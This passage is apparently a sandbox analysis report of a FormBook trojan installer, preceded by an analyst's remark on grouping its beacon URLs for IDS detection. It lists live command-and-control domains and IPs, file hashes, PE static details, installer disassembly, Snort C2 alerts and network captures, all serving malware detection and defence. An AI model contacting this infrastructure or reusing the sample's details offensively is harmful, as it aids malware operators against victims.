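`cluster` collapses the six beacon URLs into one fingerprint with six hostnames and leaves the NSIS string in its own group; `matches_campaign` is the shape of the check to put in a proxy or IDS rule, and it fires on a never-seen host as long as the path and parameter names match.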

URLs from Memory and Binaries

Name | Source | Malicious | Reputation
http://nsis.sf.net/NSIS_Error | DN_467842234567.exe | false | high
http://nsis.sf.net/NSIS_ErrorError | DN_467842234567.exe | false | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.11.163 | www.nurhalilah.xyz | United States | 13335 | CLOUDFLARENETUS | true
35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false
34.102.136.180 | uscryptomininglaws.com | United States | 15169 | GOOGLEUS | false
172.67.148.98 | www.2377k.com | United States | 13335 | CLOUDFLARENETUS | true
5.9.90.226 | www.financecreditpro.com | Germany | 24940 | HETZNER-ASDE | true
202.165.66.108 | www.drive16pay.art | Australia | 18206 | VPIS-APVADSManagedBusinessInternetServiceProviderMY | true

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:491743
                                          Start date:27.09.2021
                                          Start time:21:04:20
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 21s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:DN_467842234567.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 18
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/2@13/6
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 23.1% (good quality ratio 20.5%)
                                          • Quality average: 73.9%
                                          • Quality standard deviation: 32.9%
                                          HCA Information:
                                          • Successful, ratio: 83%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 20.82.209.183, 2.20.157.220, 20.50.102.62, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43
                                          • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491743/sample/DN_467842234567.exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

Domains

Match | Associated Sample Name / URL | Detection | Context (IP)
www.nurhalilah.xyz | DN-32T56U8I90.exe | malicious | 172.67.166.108

ASN

Match | Associated Sample Name / URL | Detection | Context (IP)
CLOUDFLARENETUS | D.I. Pipes Fittings.doc | malicious | 162.159.133.233
CLOUDFLARENETUS | 2mdb3OG6FM.exe | malicious | 104.23.98.190
CLOUDFLARENETUS | DHL AWB# 4AB19037XXX.pdf.exe | malicious | 162.159.133.233
CLOUDFLARENETUS | fTset285bI.exe | malicious | 162.159.133.233
CLOUDFLARENETUS | aQKifdER74.exe | malicious | 162.159.133.233
CLOUDFLARENETUS | s9SWgUgyO5.exe | malicious | 162.159.133.233
CLOUDFLARENETUS | Docusign_Signature_1019003.html | malicious | 104.16.19.94
CLOUDFLARENETUS | GUÍA DE CARGA...exe | malicious | 104.21.19.200
CLOUDFLARENETUS | TT09876545678T8R456.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | Original Shipping documents.exe | malicious | 162.159.129.233
CLOUDFLARENETUS | Image-Scan-80195056703950029289.exe | malicious | 162.159.133.233
CLOUDFLARENETUS | RHgAncmh0E.exe | malicious | 162.159.135.233
CLOUDFLARENETUS | InvPixcareer.-43329_20210927.xlsb | malicious | 162.159.129.233
CLOUDFLARENETUS | InvPixcareer.-43329_20210927.xlsb | malicious | 162.159.130.233
CLOUDFLARENETUS | 01_extracted.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | InvPixcareer.-5589234_20210927.xlsb | malicious | 162.159.135.233
CLOUDFLARENETUS | INQUIRY LIST.exe | malicious | 162.159.133.233
CLOUDFLARENETUS | qJvDfzBXbs | malicious | 104.16.180.49
CLOUDFLARENETUS | YTHK21082400.exe | malicious | 162.159.133.233
CLOUDFLARENETUS | Silver_Light_Group_DOC03027321122.exe | malicious | 162.159.129.233

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\heydlav1me3m3
                                          Process:C:\Users\user\Desktop\DN_467842234567.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):216352
                                          Entropy (8bit):7.988889824927144
                                          Encrypted:false
                                          SSDEEP:6144:B3LvyTtzd7TaYoyfuV6l1QOqvZV37EmPUxe:B3LKTtz5oyi2KZFXKe
                                          MD5:58C2415280597F09508AF99848706970
                                          SHA1:519D3C89A189C57CCF79D068668CCBF0D945D4AA
                                          SHA-256:1C1E3D64943CD74398E9AE298D957AF7C941FCD7161306D24FFD88A9F03A73F7
                                          SHA-512:A016852CB37C15558A4E1414E765B62719639CC466F22D697E8FBA339EAE58EC3C939C4AB3EBB00875B54CFB19A079074B67346C01968C6DBED949714FCB3E10
                                          Malicious:false
                                          Reputation:low
                                          Preview: Z+Y*5i.>.UDh....5.&......L...!e..%...Ub....W.eT..%h..fk..N....!..o..a;.}Q...G..b0.lz.I....@Z..$.....|V..>9.O.L......*..;.`.....#..0.R.gA."CS....d..P-Vm8.*.E..|......ll.ew.u.Keu.6..fo........%u.S.{e.8m.I..........F:3..MtJ..T.0...0C.04..w1.X.^..w..p.Yz'AFZi.>...<.t.YYh...l4.Zg.'..!e.w.%..Ub..t.W.eT..%h..fk......4\.eojS"\q....4.Ie....V....fM.M.N]....Y.M.e..U%g..[..V..;.`..I.JY)...[Ni9......m.)o.!..k7)Z.S.#...e:U|..E,]....h..6.....t?... ..%.S.{e.}m...5..k....F:3..M}.....0...0C.4.5w1.k.^s._..p.Y.'zFZi.>.w.<..YYh...l..Zg.'.i.!e..%...Ub....W.eT..%h..fk......4\.eojS"\q....4.Ie....V....fM.M.N]....Y.M.e..U%g..[..V..;.`..I.JY)...[Ni9......m.)o.!..k7)Z.S.#...e:U|..E,]..u.Keu.6...o.t...3f.%u.S.{e.}m...5...k....F:3..M}.....0...0C.4.5w1.k.^s._..p.Y.'zFZi.>.w.<..YYh...l..Zg.'.i.!e..%...Ub....W.eT..%h..fk......4\.eojS"\q....4.Ie....V....fM.M.N]....Y.M.e..U%g..[..V..;.`..I.JY)...[Ni9......m.)o.!..k7)Z.S.#...e:U|..E,]..u.Keu.6...o.t...3f.%u.S.{e.}m...5...k....F:3..M}.....0
                                          C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll
                                           Process: C:\Users\user\Desktop\DN_467842234567.exe
                                           File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                           Category: dropped
                                           Size (bytes): 16384
                                           Entropy (8bit): 6.5327019634702514
                                           Encrypted: false
                                           SSDEEP: 192:4ouT5wvAi3OL1PJuIJHSArHv6vQmgbehh8dgq47bmDQH4UJ58cHk2:4ouT7ZSav6KYmDncE2
                                           MD5: 6B93D55CD940BABD5EAB05E0A8A2FEA7
                                           SHA1: E2FC9047947BDD96F92B8E1D103FC13FB606D540
                                           SHA-256: 3EEFD1C7DAF2B08BC38159F216CD5E79CA1BDAF923EE6993EDDBC602E6B84E15
                                           SHA-512: 070016B91BE674AD938CC407D045D1D175ACBEE61161EC63A994D84E74E72663AA6B1BC3E57843F6BEF5C13C26E066E245CCDDDC41FA198435DED18CAA3A2DD8
                                           Malicious: true
                                           Antivirus:
                                           • Antivirus: Joe Sandbox ML, Detection: 100%
                                           • Antivirus: ReversingLabs, Detection: 11%
                                           Reputation: low

                                          Static File Info

                                          General

                                           File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                           Entropy (8bit): 7.907089954961491
                                           TrID:
                                           • Win32 Executable (generic) a (10002005/4) 99.96%
                                           • Generic Win/DOS Executable (2004/3) 0.02%
                                           • DOS Executable Generic (2002/1) 0.02%
                                           • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                           File name: DN_467842234567.exe
                                           File size (bytes): 259211
                                           MD5: c16013ea29f9dd1525dcb65c2184784e
                                           SHA1: 5afd533f29573050734e428f9f8c9ba08c79546a
                                           SHA256: df05d916a02c09e1dba0df0841f93697e407a334ce8d2371dfe8befd909d8a43
                                           SHA512: 87c9e01aac687d2c675cb281592c930ce7bfefebc4eecde4135834bf896265d0238f9afc98726214fc30ef19c2528740aadf12df00e7cb44c469e56d5e9eefca
                                           SSDEEP: 6144:F8LxBsFqxTsbu0sRCwePkl1QOOMKgUx6N:/slG1465p+

                                          File Icon

                                           Icon Hash: b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                           Entrypoint: 0x40312a
                                           Entrypoint Section: .text
                                           Digitally signed: false
                                           Imagebase: 0x400000
                                           Subsystem: windows gui
                                           Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                           DLL Characteristics: TERMINAL_SERVER_AWARE
                                           Time Stamp: 0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                           TLS Callbacks:
                                           CLR (.Net) Version:
                                           OS Version Major: 4
                                           OS Version Minor: 0
                                           File Version Major: 4
                                           File Version Minor: 0
                                           Subsystem Version Major: 4
                                           Subsystem Version Minor: 0
                                           Import Hash: b76363e9cb88bf9390860da8e50999d2

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+20h], ebx
                                          mov dword ptr [esp+14h], 00409168h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov byte ptr [esp+18h], 00000020h
                                          call dword ptr [004070B0h]
                                          call dword ptr [004070ACh]
                                          cmp ax, 00000006h
                                          je 00007F467CB36D43h
                                          push ebx
                                          call 00007F467CB39B24h
                                          cmp eax, ebx
                                          je 00007F467CB36D39h
                                          push 00000C00h
                                          call eax
                                          mov esi, 00407280h
                                          push esi
                                          call 00007F467CB39AA0h
                                          push esi
                                          call dword ptr [00407108h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007F467CB36D1Dh
                                          push 0000000Dh
                                          call 00007F467CB39AF8h
                                          push 0000000Bh
                                          call 00007F467CB39AF1h
                                          mov dword ptr [0042EC24h], eax
                                          call dword ptr [00407038h]
                                          push ebx
                                          call dword ptr [0040726Ch]
                                          mov dword ptr [0042ECD8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 00429058h
                                          call dword ptr [0040715Ch]
                                          push 0040915Ch
                                          push 0042E420h
                                          call 00007F467CB39724h
                                          call dword ptr [0040710Ch]
                                          mov ebp, 00434000h
                                          push eax
                                          push ebp
                                          call 00007F467CB39712h
                                          push ebx
                                          call dword ptr [00407144h]

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                           Name | Virtual Address | Virtual Size | Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7524 | 0xa0 | .rdata
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x9e0 | .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                           Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                           .text | 0x1000 | 0x5e66 | 0x6000 | False | 0.670572916667 | data | 6.44065573436 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                           .rdata | 0x7000 | 0x12a2 | 0x1400 | False | 0.4455078125 | data | 5.0583287871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .data | 0x9000 | 0x25d18 | 0x600 | False | 0.458984375 | data | 4.18773476617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                           .ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .rsrc | 0x37000 | 0x9e0 | 0xa00 | False | 0.45390625 | data | 4.4968702957 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                           Name | RVA | Size | Type | Language | Country
                                           RT_ICON | 0x37190 | 0x2e8 | data | English | United States
                                           RT_DIALOG | 0x37478 | 0x100 | data | English | United States
                                           RT_DIALOG | 0x37578 | 0x11c | data | English | United States
                                           RT_DIALOG | 0x37698 | 0x60 | data | English | United States
                                           RT_GROUP_ICON | 0x376f8 | 0x14 | data | English | United States
                                           RT_MANIFEST | 0x37710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                          Imports

                                           DLL | Imports
                                           KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                           USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                           GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                           SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                           ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                           COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                           ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

                                           Language of compilation system | Country where language is spoken
                                           English | United States

                                          Network Behavior

                                          Snort IDS Alerts

                                           Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                           09/27/21-21:06:35.892571 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49829 | 34.102.136.180 | 192.168.2.4
                                           09/27/21-21:06:40.999753 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49839 | 80 | 192.168.2.4 | 5.9.90.226
                                           09/27/21-21:06:40.999753 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49839 | 80 | 192.168.2.4 | 5.9.90.226
                                           09/27/21-21:06:40.999753 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49839 | 80 | 192.168.2.4 | 5.9.90.226
                                           09/27/21-21:07:01.684685 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49849 | 80 | 192.168.2.4 | 35.246.6.109
                                           09/27/21-21:07:01.684685 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49849 | 80 | 192.168.2.4 | 35.246.6.109
                                           09/27/21-21:07:01.684685 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49849 | 80 | 192.168.2.4 | 35.246.6.109
                                           09/27/21-21:07:17.348883 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 62420 | 8.8.8.8 | 192.168.2.4

                                          Network Port Distribution

                                          TCP Packets

                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Sep 27, 2021 21:06:30.553550959 CEST | 49828 | 80 | 192.168.2.4 | 104.21.11.163
                                           Sep 27, 2021 21:06:30.573894024 CEST | 80 | 49828 | 104.21.11.163 | 192.168.2.4
                                           Sep 27, 2021 21:06:30.574076891 CEST | 49828 | 80 | 192.168.2.4 | 104.21.11.163
                                           Sep 27, 2021 21:06:30.575259924 CEST | 49828 | 80 | 192.168.2.4 | 104.21.11.163
                                           Sep 27, 2021 21:06:30.595679045 CEST | 80 | 49828 | 104.21.11.163 | 192.168.2.4
                                           Sep 27, 2021 21:06:30.639205933 CEST | 80 | 49828 | 104.21.11.163 | 192.168.2.4
                                           Sep 27, 2021 21:06:30.639230967 CEST | 80 | 49828 | 104.21.11.163 | 192.168.2.4
                                           Sep 27, 2021 21:06:30.639241934 CEST | 80 | 49828 | 104.21.11.163 | 192.168.2.4
                                           Sep 27, 2021 21:06:30.639520884 CEST | 49828 | 80 | 192.168.2.4 | 104.21.11.163
                                           Sep 27, 2021 21:06:30.639628887 CEST | 49828 | 80 | 192.168.2.4 | 104.21.11.163
                                           Sep 27, 2021 21:06:35.700731993 CEST | 49829 | 80 | 192.168.2.4 | 34.102.136.180
                                           Sep 27, 2021 21:06:35.713982105 CEST | 80 | 49829 | 34.102.136.180 | 192.168.2.4
                                           Sep 27, 2021 21:06:35.714169025 CEST | 49829 | 80 | 192.168.2.4 | 34.102.136.180
                                           Sep 27, 2021 21:06:35.714364052 CEST | 49829 | 80 | 192.168.2.4 | 34.102.136.180
                                           Sep 27, 2021 21:06:35.726947069 CEST | 80 | 49829 | 34.102.136.180 | 192.168.2.4
                                           Sep 27, 2021 21:06:35.892570972 CEST | 80 | 49829 | 34.102.136.180 | 192.168.2.4
                                           Sep 27, 2021 21:06:35.892592907 CEST | 80 | 49829 | 34.102.136.180 | 192.168.2.4
                                           Sep 27, 2021 21:06:35.892792940 CEST | 49829 | 80 | 192.168.2.4 | 34.102.136.180
                                           Sep 27, 2021 21:06:35.892947912 CEST | 49829 | 80 | 192.168.2.4 | 34.102.136.180
                                           Sep 27, 2021 21:06:35.905397892 CEST | 80 | 49829 | 34.102.136.180 | 192.168.2.4
                                           Sep 27, 2021 21:06:40.974280119 CEST | 49839 | 80 | 192.168.2.4 | 5.9.90.226
                                           Sep 27, 2021 21:06:40.999039888 CEST | 80 | 49839 | 5.9.90.226 | 192.168.2.4
                                           Sep 27, 2021 21:06:40.999228001 CEST | 49839 | 80 | 192.168.2.4 | 5.9.90.226
                                           Sep 27, 2021 21:06:40.999752998 CEST | 49839 | 80 | 192.168.2.4 | 5.9.90.226
                                           Sep 27, 2021 21:06:41.026427031 CEST | 80 | 49839 | 5.9.90.226 | 192.168.2.4
                                           Sep 27, 2021 21:06:41.026473045 CEST | 80 | 49839 | 5.9.90.226 | 192.168.2.4
                                           Sep 27, 2021 21:06:41.026489019 CEST | 80 | 49839 | 5.9.90.226 | 192.168.2.4
                                           Sep 27, 2021 21:06:41.026765108 CEST | 49839 | 80 | 192.168.2.4 | 5.9.90.226
                                           Sep 27, 2021 21:06:41.026814938 CEST | 49839 | 80 | 192.168.2.4 | 5.9.90.226
                                           Sep 27, 2021 21:06:41.055721998 CEST | 80 | 49839 | 5.9.90.226 | 192.168.2.4
                                           Sep 27, 2021 21:07:01.652254105 CEST | 49849 | 80 | 192.168.2.4 | 35.246.6.109
                                           Sep 27, 2021 21:07:01.684393883 CEST | 80 | 49849 | 35.246.6.109 | 192.168.2.4
                                           Sep 27, 2021 21:07:01.684525967 CEST | 49849 | 80 | 192.168.2.4 | 35.246.6.109
                                           Sep 27, 2021 21:07:01.684684992 CEST | 49849 | 80 | 192.168.2.4 | 35.246.6.109
                                           Sep 27, 2021 21:07:01.716600895 CEST | 80 | 49849 | 35.246.6.109 | 192.168.2.4
                                           Sep 27, 2021 21:07:01.767618895 CEST | 80 | 49849 | 35.246.6.109 | 192.168.2.4
                                           Sep 27, 2021 21:07:01.767653942 CEST | 80 | 49849 | 35.246.6.109 | 192.168.2.4
                                           Sep 27, 2021 21:07:01.767867088 CEST | 49849 | 80 | 192.168.2.4 | 35.246.6.109
                                           Sep 27, 2021 21:07:01.774135113 CEST | 49849 | 80 | 192.168.2.4 | 35.246.6.109
                                           Sep 27, 2021 21:07:01.806262970 CEST | 80 | 49849 | 35.246.6.109 | 192.168.2.4
                                           Sep 27, 2021 21:07:11.864828110 CEST | 49862 | 80 | 192.168.2.4 | 172.67.148.98
                                           Sep 27, 2021 21:07:11.884675026 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:11.884784937 CEST | 49862 | 80 | 192.168.2.4 | 172.67.148.98
                                           Sep 27, 2021 21:07:11.884968996 CEST | 49862 | 80 | 192.168.2.4 | 172.67.148.98
                                           Sep 27, 2021 21:07:11.906678915 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:12.270593882 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:12.270634890 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:12.270663023 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:12.270725012 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:12.270749092 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:12.270771027 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:12.270791054 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:12.270921946 CEST | 80 | 49862 | 172.67.148.98 | 192.168.2.4
                                           Sep 27, 2021 21:07:12.270957947 CEST | 49862 | 80 | 192.168.2.4 | 172.67.148.98
                                           Sep 27, 2021 21:07:12.271037102 CEST | 49862 | 80 | 192.168.2.4 | 172.67.148.98
                                           Sep 27, 2021 21:07:12.271249056 CEST | 49862 | 80 | 192.168.2.4 | 172.67.148.98
                                           Sep 27, 2021 21:07:17.350616932 CEST | 49863 | 80 | 192.168.2.4 | 202.165.66.108
                                           Sep 27, 2021 21:07:17.621839046 CEST | 80 | 49863 | 202.165.66.108 | 192.168.2.4
                                           Sep 27, 2021 21:07:17.621975899 CEST | 49863 | 80 | 192.168.2.4 | 202.165.66.108
                                           Sep 27, 2021 21:07:17.622366905 CEST | 49863 | 80 | 192.168.2.4 | 202.165.66.108
                                           Sep 27, 2021 21:07:17.893615961 CEST | 80 | 49863 | 202.165.66.108 | 192.168.2.4
                                           Sep 27, 2021 21:07:18.128928900 CEST | 49863 | 80 | 192.168.2.4 | 202.165.66.108
                                           Sep 27, 2021 21:07:18.216249943 CEST | 80 | 49863 | 202.165.66.108 | 192.168.2.4
                                           Sep 27, 2021 21:07:18.216413975 CEST | 49863 | 80 | 192.168.2.4 | 202.165.66.108
                                           Sep 27, 2021 21:07:18.216514111 CEST | 80 | 49863 | 202.165.66.108 | 192.168.2.4
                                           Sep 27, 2021 21:07:18.216593981 CEST | 49863 | 80 | 192.168.2.4 | 202.165.66.108
                                           Sep 27, 2021 21:07:18.400197983 CEST | 80 | 49863 | 202.165.66.108 | 192.168.2.4
                                           Sep 27, 2021 21:07:18.400415897 CEST | 49863 | 80 | 192.168.2.4 | 202.165.66.108

                                          UDP Packets

                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Sep 27, 2021 21:05:12.751811981 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:05:12.765037060 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:05:12.815171957 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:05:12.849423885 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:05:15.308841944 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:05:15.328419924 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:05:47.821726084 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:05:47.856849909 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:04.935619116 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:04.949014902 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:19.382409096 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:19.466084003 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:20.491133928 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:20.590030909 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:21.112752914 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                           Sep 27, 2021 21:06:21.126204014 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                           Sep 27, 2021 21:06:21.517863989 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
